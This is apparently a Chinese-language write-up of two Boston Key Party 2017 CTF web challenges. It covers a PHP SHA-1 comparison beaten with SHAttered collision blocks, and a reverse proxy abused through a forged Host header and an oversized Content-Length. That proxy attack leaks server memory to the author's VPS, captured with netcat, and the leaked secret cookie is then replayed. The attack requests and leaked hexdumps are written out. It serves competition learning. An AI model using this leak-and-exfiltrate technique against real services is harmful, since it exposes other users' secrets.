这周,跟着实验室各位大佬们参加了BKP的比赛。国际CTF比赛好像更加综合一些,对选手即要求二进制基础也要求Web基础。下面是两道Web题的解答。
Prudentialv2
这题是修复了2015年出的Prudential的漏洞。
http://blog.rentjong.net/2015/03/boston-key-party-2015-prudential.html
源码可以在index.txt中看到http://54.202.82.13/index.txt
<html>
<head>
<title>level1</title>
<link rel='stylesheet' href='style.css' type='text/css'>
</head>
<body>
<?php
require 'flag.php';
if (isset($_GET['name']) and isset($_GET['password'])) {
$name = (string)$_GET['name'];
$password = (string)$_GET['password'];
if ($name == $password) {
print 'Your password can not be your name.';
} else if (sha1($name) === sha1($password)) {
die('Flag: '.$flag);
} else {
print '<p class="alert">Invalid password.</p>';
}
}
?>
<section class="login">
<div class="title">
<a href="./index.txt">Level 1</a>
</div>
<form method="get">
<input type="text" required name="name" placeholder="Name"/><br/>
<input type="text" required name="password" placeholder="Password" /><br/>
<input type="submit"/>
</form>
</section>
</body>
</html>
因为string了,而且还是强等于。所以以前的方法基本不行。我们需要找到一对碰撞sha1,才能成功。
结合前天google发的sha-1碰撞论文,https://shattered.io/static/shattered.pdf用里面给的两个示例pdf文件进行构造就好。
构造的时候会发现pdf太大了,无法在url中完全带上。然后,看论文中有这么一句:This is an identical-prefix collision attack, where a given prefix P is extended with two distinct near-collision block pairs such that they collide for any suffix S。图片的说明如下:** https://shattered.it/static/pdf_format.png**说明,碰撞部分是pdf中的某一部分,而不是全部。那么我们就可以尝试取pdf的某一部分,进行sha-1,让其碰撞。
找到碰撞部分,以urlencode编码发送请求,就能得到flag
Accelerated.zone
题目给了一个反向代理,其功能大致有:
- 8000端口会反向代理7733的数据
- 反代不管访问啥都会返回500
- 在逆反向代理,核心用的是这个库https://github.com/rboulton/libmicrohttpd ,大概逻辑是用这个库起了一个server,读取来自用户的输入,然后起一个curl读取远程的内容,再返回
- 发送给反代的http头部中的host指向的部分,实际控制代理服务器的转发。即host指向哪,服务器就会向那进行转发
后来,问了队友,队友说这题存在内存泄漏,把泄漏数据打到VPS上读取就好了。(可能这就是这个反向代理软件运行久了,就超级烧内存和CPU的原因)
所以,向Accerletated发送一个包,host为自己的VPS,然后查看数据。
这个包需要是POST的数据包,然后content-length需要很大。
POST / HTTP/1.1
Host: xx.xx.13.97:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 999999999
123
在VPS上可以看到数据
[root@cloud ~]# nc -l -vv 7733|hexdump -Cv
Connection from 54.218.82.219 port 7733 [tcp/*] accepted
00000000 50 4f 53 54 20 2f 20 48 54 54 50 2f 31 2e 31 0d |POST / HTTP/1.1.|
00000010 0a 48 6f 73 74 3a 20 31 31 38 2e 39 39 2e 31 33 |.Host: xx.x.xx|
00000020 2e 39 37 3a 37 37 33 33 0d 0a 41 63 63 65 70 74 |.xx:xx..Accept|
00000030 3a 20 2a 2f 2a 0d 0a 43 6f 6e 74 65 6e 74 2d 4c |: */*..Content-L|
00000040 65 6e 67 74 68 3a 20 33 38 35 32 37 0d 0a 43 6f |ength: 38527..Co|
00000050 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c |ntent-Type: appl|
00000060 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f |ication/x-www-fo|
00000070 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 0d 0a 45 |rm-urlencoded..E|
00000080 78 70 65 63 74 3a 20 31 30 30 2d 63 6f 6e 74 69 |xpect: 100-conti|
00000090 6e 75 65 0d 0a 0d 0a 31 32 33 00 00 00 00 00 00 |nue....123......|
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
...
0088f0 00 11 7e 00 00 00 00 00 00 b8 07 00 c0 b9 7f 00 |..~.............|
00008900 00 b8 07 00 c0 b9 7f 00 00 e0 92 00 c0 b9 7f 00 |................|
00008910 00 e0 92 00 c0 b9 7f 00 00 74 20 69 70 36 2d 6c |.........t ip6-l|
00008920 6f 63 61 6c 68 6f 73 74 20 69 70 36 2d 6c 6f 6f |ocalhost ip6-loo|
00008930 70 62 61 63 6b 0a 66 65 30 30 3a 3a 30 09 69 70 |pback.fe00::0.ip|
00008940 36 2d 6c 6f 63 61 6c 6e 65 74 0a 66 66 30 30 3a |6-localnet.ff00:|
00008950 3a 30 09 69 70 36 2d 6d 63 61 73 74 70 72 65 66 |:0.ip6-mcastpref|
00008960 69 78 0a 66 66 30 32 3a 3a 31 09 69 70 36 2d 61 |ix.ff02::1.ip6-a|
00008970 6c 6c 6e 6f 64 65 73 0a 66 66 30 32 3a 3a 32 09 |llnodes.ff02::2.|
00008980 69 70 36 2d 61 6c 6c 72 6f 75 74 65 72 73 0a 31 |ip6-allrouters.1|
00008990 37 32 2e 31 37 2e 30 2e 32 09 34 32 39 63 35 37 |72.17.0.2.429c57|
000089a0 64 38 38 31 32 34 0a 72 63 68 20 75 73 2d 77 65 |d88124.rch us-we|
000089b0 73 74 2d 32 2e 63 6f 6d 70 75 74 65 2e 69 6e 74 |st-2.compute.int|
000089c0 65 72 6e 61 6c 0a 00 00 00 00 00 00 00 00 00 00 |ernal...........|
多打几次会打到一个cookie
00007d50 00 00 00 40 87 00 dc 53 7f 00 00 47 87 00 dc 53 |...@...S...G...S|
00007d60 7f 00 00 02 00 00 00 00 00 00 00 73 65 63 72 65 |...........secre|
00007d70 74 00 73 50 62 6b 54 68 62 32 69 4b 59 4f 38 74 |t.sPbkThb2iKYO8t|
00007d80 5a 53 50 49 31 70 71 77 00 00 00 20 87 00 dc 53 |ZSPI1pqw... ...S|
00007d90 7f 00 00 7a 0a 00 dc 53 7f 00 00 8a 0a 00 dc 53 |...z...S.......S|
Cookie: secret=sPbkThb2iKYO8tZSPI1pqw
然后,带着cookie访问,就能得到flag
GET / HTTP/1.1
Host: accelerated.zone:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: secret=sPbkThb2iKYO8tZSPI1pqw
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 63
Content-Type: text/html; charset=UTF-8
Date: Sun, 26 Feb 2017 03:47:37 GMT
FLAG{ISwearIWroteThisChallengeWeeksAgo}Get better cookies bro.